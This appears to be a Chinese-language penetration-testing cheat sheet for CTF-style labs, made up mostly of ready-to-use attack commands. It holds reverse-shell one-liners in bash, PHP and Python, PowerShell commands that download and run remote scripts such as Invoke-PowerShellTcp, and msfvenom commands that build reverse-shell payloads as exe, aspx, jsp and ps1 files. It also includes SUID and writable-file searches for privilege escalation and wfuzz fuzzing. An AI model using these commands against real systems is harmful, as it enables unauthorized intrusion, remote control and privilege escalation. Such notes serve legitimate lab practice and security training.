代码
python bash交互页面
python3 -c 'import pty; pty.spawn("/bin/bash")'
反弹代码
bash反弹shell
/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'
php bash反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.30/4444 0>&1'");?>
php 脚本反弹shell
php -r '$sock=fsockopen("10.xxx.xxx.xx",2333);exec("/bin/sh -i <&3 >&3 2>&3");'
python 脚本反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.xxx.xxx.xx",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
window文件
用dir命令查找文件
cmd
cd C:\ && dir user.txt /s /b
ps
Get-ChildItem -Path C:\ -Recurse -Name *user.txt*
# powershell
# cmd.exe
# nc.exe
# temp
# public
# user.txt
# root.txt
命令 | 说明 |
---|---|
- /s | 是指列出当前目录包含子目录下的所有文件 |
- /b | 是仅列出文件名称,而日期、大小等其它信息则忽略 |
远程下载
- 下载直接运行
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5/Sherlock.ps1'); Find-AllVulns"
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -port 4444
iex(new-object system.net.webclient).downloadstring("http://10.10.16.5/Sherlock.ps1")
- 下载并保存
(new-object system.net.webclient).downloadfile("http://10.10.16.5/shell.exe","C:\Users\Public\shell.exe")
linux文件
grep 文件内容
grep -R -i root /home/* 2>/dev/null
find 搜索文件名
- back
- history
*back* *history*
find / -name "*back*" 2>/dev/null
find 用户组
find / -group user -type f 2>/dev/null
find 用户有s权限
find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f -user root 2>/dev/null
find root主,其他用户也用执行或者写入权限
- 命令解释:从根目录下开始查找 文件类型 属主是root 普通用户或组可执行 其他用户可写 如果发现了符合条件的用 ls -l命令显示 错误信息从定向到null
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
开启服务器
路由
window-快捷键
services.msc
- 服务
regedit
- 注册表
ncpa.cpl
- 网络适配器
字典
wfuzz
- /usr/share/wfuzz/wordlist/general/common.txt
# 参数
sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.56.14//index.php?FUZZ=something
# 目录
wfuzz -w wordlist/general/common.txt --sc 200,301 http://testphp.vulnweb.com/FUZZ
公共
- /usr/share/wordlists/rockyou.txt
工具
impacket
export PATH=/usr/share/doc/python3-impacket/examples:$PATH
smbserver.py share . -smb2support
# 一定是\\和\
copy \\10.10.16.5\share\winPEAS.exe .
git
- 代理
-c "http.proxy=10.0.2.1:10811"
ftp
- 匿名
anonymous
木马
msf
- 注意shell还是meterpreter
- 注意是否x64还是默认32
ps1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=4545 --arch x64 --platform windows -f psh-reflection -o reverse.ps1
exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4445 -f exe -o shell.exe
aspx
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f aspx -o shell.aspx
jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=443 -f raw -o shell.jsp